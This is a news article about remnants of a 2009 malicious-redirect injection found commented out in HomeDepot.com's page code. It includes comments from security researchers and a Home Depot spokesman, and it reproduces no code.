The website for do-it-yourself giant Home Depot has been … well, screwed.
An IT analyst has uncovered the lingering remnants of a 2009 breach of security on the website of the major retailer: secret code hidden on the website that redirected the user’s browser to a site that served up malware.
“Somebody managed to deface the site and inject that code, so that anyone visiting the site would have loaded the malicious code from this other site,” explained Mike Menefee, founder of security website Infosec Island, which discovered the hack.
He stressed that HomeDepot.com isn’t presently a threat, nor has it been for quite a while. Experts told FoxNews.com that the hack was discovered by someone and disabled — and that’s the mysterious part of the whole thing. Who leaves malicious code lying in wait — dormant, disabled and inactive on their site?
“It looks like the Home Depot site was hacked at some point but is currently not a threat to visitors,” said Chet Wisniewski, senior security advisor with security firm Sophos Labs. But Wisniewski couldn’t explain why the malicious code remained on the retail giant’s website, made inactive by labeling it a comment — a fact security analysts found simply bizarre.
“Looks like laziness to me,” he told FoxNews.com. “If a web developer stumbled onto this by accident and thought it looked funny, he may have ‘commented it out’ to be sure he could undo it right away if it was supposed to be there.”
Or perhaps the hackers themselves could have disabled the code, perhaps intending to turn it on again at a later date?
“I think it’s unlikely an attacker would intentionally leave behind evidence that he was there commented out … But anything is possible,” Wisniewski said.
While stressing that the site had not been hacked — Home Depot prefers to call the 2009 incident a “breach of security” — spokesman Steve Holmes told FoxNews.com the code was intentionally disabled but left up on the site “for management and analysis.”
“That’s a fairly standard way of making the code inoperable,” he said, noting that it was done in 2009.
“It has now been removed,” Holmes said.
A reader named Scott Frost logged in to note the same thing, pointing out that the malicious code “was commented out and therefore not an issue.” And Frost makes a very good point, Menefee said.
“His defense was, it wasn’t actively running code. He’s right. But leaving it there makes them look pretty careless,” Menefee said, calling the technique of commenting out code “bad practice.” And beyond being poor form, the presence of this code actually set off the antivirus alarms on Mark Baldwin’s PC, alerting him to its existence.
Baldwin, who initially discovered the code and blogged about it for Infosec Island, stressed that the Home Depot site was not a threat to do-it-yourselfers at present, but agreed: The continued existence of the malicious code was weird.
“Does it mean that they lost any customer data? No, not at all,” he told FoxNews.com. But someone definitely hacked the site, probably in 2009 when a rash of such attacks occurred to tens of thousands of sites, he said.
“At some point, that code had to be put in there — and it certainly wasn’t put in by them,” Baldwin said.
“It’s certainly not something I would expect in an organization like this,” Menefee agreed. “It’s pretty sloppy.”
